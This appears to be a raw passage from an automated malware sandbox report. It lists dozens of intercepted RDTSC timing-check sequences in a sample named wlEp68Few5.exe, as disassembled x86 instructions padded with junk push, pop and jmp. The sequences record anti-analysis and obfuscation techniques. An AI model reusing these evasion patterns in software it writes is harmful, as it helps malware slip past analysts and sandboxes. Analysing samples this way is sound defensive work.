Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C7DF80 second address: C7DF99 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jnl 00007F6F951A9EB6h 0x00000009 jmp 00007F6F951A9EBAh 0x0000000e pop ebx 0x0000000f push esi 0x00000010 push edx 0x00000011 pop edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C27AD7 second address: C27ADD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C27ADD second address: C27AE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C27AE1 second address: C27AF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6F946E7E3Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C27AF1 second address: C27AF6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C27AF6 second address: C27B0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F6F946E7E3Dh 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C7E6BF second address: C7E6C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C7E6C3 second address: C7E6C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C7CFEE second address: C7D019 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 jmp 00007F6F951A9EC1h 0x0000000c push ecx 0x0000000d jmp 00007F6F951A9EC0h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C836A9 second address: C836BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push ecx 0x00000007 push ecx 0x00000008 jl 00007F6F946E7E36h 0x0000000e pop ecx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C82E01 second address: C82E05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C82E05 second address: C82E72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F6F946E7E36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F6F946E7E41h 0x00000011 push esi 0x00000012 jmp 00007F6F946E7E44h 0x00000017 jmp 00007F6F946E7E48h 0x0000001c pop esi 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 push esi 0x00000021 jp 00007F6F946E7E36h 0x00000027 pop esi 0x00000028 push eax 0x00000029 jmp 00007F6F946E7E43h 0x0000002e push ecx 0x0000002f pop ecx 0x00000030 pop eax 0x00000031 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C82E72 second address: C82E77 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C83C82 second address: C83C86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C83DFA second address: C83E0E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F951A9EBAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b popad 0x0000000c push edi 0x0000000d pop edi 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C84118 second address: C84132 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F6F946E7E41h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C84132 second address: C84158 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F951A9EBAh 0x00000007 jmp 00007F6F951A9EC8h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C88AAF second address: C88AC4 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F6F946E7E3Ah 0x00000008 pushad 0x00000009 popad 0x0000000a push edx 0x0000000b pop edx 0x0000000c push edi 0x0000000d je 00007F6F946E7E36h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: BF852E second address: BF8538 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F6F951A9EB6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: BF8538 second address: BF8542 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: BF8542 second address: BF8548 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C3FBF1 second address: C3FBF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C3FBF5 second address: C3FBFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C3FFDB second address: C3FFDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C40207 second address: C40214 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C40214 second address: C40218 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C40218 second address: C4021E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C4021E second address: C40239 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6F946E7E47h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C40239 second address: C4023D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C40410 second address: C40414 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C40414 second address: C4041E instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F6F951A9EB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C4041E second address: C40423 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C404F8 second address: C4055E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F951A9EC7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 call 00007F6F951A9EB8h 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], esi 0x0000001a add dword ptr [esp+04h], 00000019h 0x00000022 inc esi 0x00000023 push esi 0x00000024 ret 0x00000025 pop esi 0x00000026 ret 0x00000027 push 00000004h 0x00000029 pushad 0x0000002a mov dword ptr [ebp+122DB716h], ecx 0x00000030 mov al, dl 0x00000032 popad 0x00000033 push eax 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F6F951A9EC7h 0x0000003b rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C4055E second address: C40575 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6F946E7E43h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C40C29 second address: C40C59 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jmp 00007F6F951A9EC4h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push ecx 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 pop edx 0x00000013 pop ecx 0x00000014 mov eax, dword ptr [esp+04h] 0x00000018 push eax 0x00000019 jl 00007F6F951A9EBCh 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C40C59 second address: C40C70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 mov eax, dword ptr [eax] 0x00000007 push ecx 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e pop ecx 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 push edi 0x00000014 push ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C40E1F second address: C27AD7 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F6F951A9EB8h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007F6F951A9EBDh 0x00000012 nop 0x00000013 mov dword ptr [ebp+124753E7h], edi 0x00000019 call dword ptr [ebp+122DB6FBh] 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C87BA9 second address: C87BC4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F946E7E41h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C87BC4 second address: C87BDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F6F951A9EC0h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C87BDD second address: C87BE7 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F6F946E7E36h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C87EE7 second address: C87F02 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F6F951A9EBBh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jng 00007F6F951A9EBAh 0x00000011 push eax 0x00000012 pop eax 0x00000013 push esi 0x00000014 pop esi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C88310 second address: C88322 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F6F946E7E3Dh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C88322 second address: C8832C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C8832C second address: C88332 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C88332 second address: C88355 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a jl 00007F6F951A9EB6h 0x00000010 pop edx 0x00000011 jmp 00007F6F951A9EC2h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C88355 second address: C8835C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C8AE62 second address: C8AE72 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F6F951A9EB6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C8AE72 second address: C8AE8B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F946E7E45h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: BFD6C8 second address: BFD6D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: BFD6D0 second address: BFD6D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C8D946 second address: C8D94A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C8D94A second address: C8D954 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C8D954 second address: C8D958 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C8DA87 second address: C8DA91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F6F946E7E36h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C8DA91 second address: C8DA95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C8DBFF second address: C8DC03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C8DC03 second address: C8DC07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C8DC07 second address: C8DC27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F6F946E7E36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007F6F946E7E40h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C93173 second address: C9317B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C9317B second address: C93183 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C93183 second address: C93187 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C93187 second address: C9318D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C9318D second address: C931B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jmp 00007F6F951A9EC7h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C931B1 second address: C931B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C937A8 second address: C937AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C937AE second address: C937D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F946E7E44h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push esi 0x0000000d pop esi 0x0000000e jno 00007F6F946E7E36h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C9393B second address: C9393F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C9393F second address: C93973 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F946E7E3Ah 0x00000007 jmp 00007F6F946E7E47h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jmp 00007F6F946E7E3Fh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C93973 second address: C9397E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F6F951A9EB6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C4076A second address: C407B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dword ptr [esp], eax 0x00000007 add cl, FFFFFF84h 0x0000000a mov ebx, dword ptr [ebp+1248578Eh] 0x00000010 movzx edi, dx 0x00000013 add eax, ebx 0x00000015 push 00000000h 0x00000017 push ecx 0x00000018 call 00007F6F946E7E38h 0x0000001d pop ecx 0x0000001e mov dword ptr [esp+04h], ecx 0x00000022 add dword ptr [esp+04h], 0000001Dh 0x0000002a inc ecx 0x0000002b push ecx 0x0000002c ret 0x0000002d pop ecx 0x0000002e ret 0x0000002f nop 0x00000030 pushad 0x00000031 js 00007F6F946E7E38h 0x00000037 pushad 0x00000038 popad 0x00000039 push eax 0x0000003a push edx 0x0000003b push ebx 0x0000003c pop ebx 0x0000003d rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C407B2 second address: C407FA instructions: 0x00000000 rdtsc 0x00000002 jc 00007F6F951A9EB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c jmp 00007F6F951A9EBEh 0x00000011 nop 0x00000012 add edx, dword ptr [ebp+122D18BDh] 0x00000018 push 00000004h 0x0000001a movsx edx, dx 0x0000001d nop 0x0000001e push esi 0x0000001f jmp 00007F6F951A9EC8h 0x00000024 pop esi 0x00000025 push eax 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C407FA second address: C407FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C407FE second address: C40804 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C99FE5 second address: C9A004 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F946E7E46h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C9AB6E second address: C9AB7F instructions: 0x00000000 rdtsc 0x00000002 jns 00007F6F951A9EB8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C9AB7F second address: C9AB83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C9AB83 second address: C9ABA9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F6F951A9EBFh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c jne 00007F6F951A9EB6h 0x00000012 jp 00007F6F951A9EB6h 0x00000018 pop edi 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C9D81B second address: C9D81F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C9D81F second address: C9D825 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C9D825 second address: C9D83C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007F6F946E7E3Fh 0x0000000c pop ecx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C9D83C second address: C9D86F instructions: 0x00000000 rdtsc 0x00000002 jne 00007F6F951A9EBCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F6F951A9EC2h 0x00000010 pushad 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a jns 00007F6F951A9EB6h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C9D86F second address: C9D873 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: CA4644 second address: CA467B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007F6F951A9ECDh 0x0000000b jmp 00007F6F951A9EC5h 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 popad 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jnc 00007F6F951A9EB6h 0x0000001c jmp 00007F6F951A9EBBh 0x00000021 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: CA4927 second address: CA492B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: CA492B second address: CA494F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jl 00007F6F951A9EB6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jnc 00007F6F951A9EB6h 0x00000014 jmp 00007F6F951A9EC0h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: CA4BB0 second address: CA4BB5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: CA4BB5 second address: CA4BE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6F951A9EBEh 0x00000009 jbe 00007F6F951A9EB6h 0x0000000f popad 0x00000010 pushad 0x00000011 jnp 00007F6F951A9EB6h 0x00000017 push eax 0x00000018 pop eax 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 jng 00007F6F951A9EB6h 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: CA4BE6 second address: CA4BEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: CA4BEA second address: CA4C10 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F6F951A9EC8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b js 00007F6F951A9EBCh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
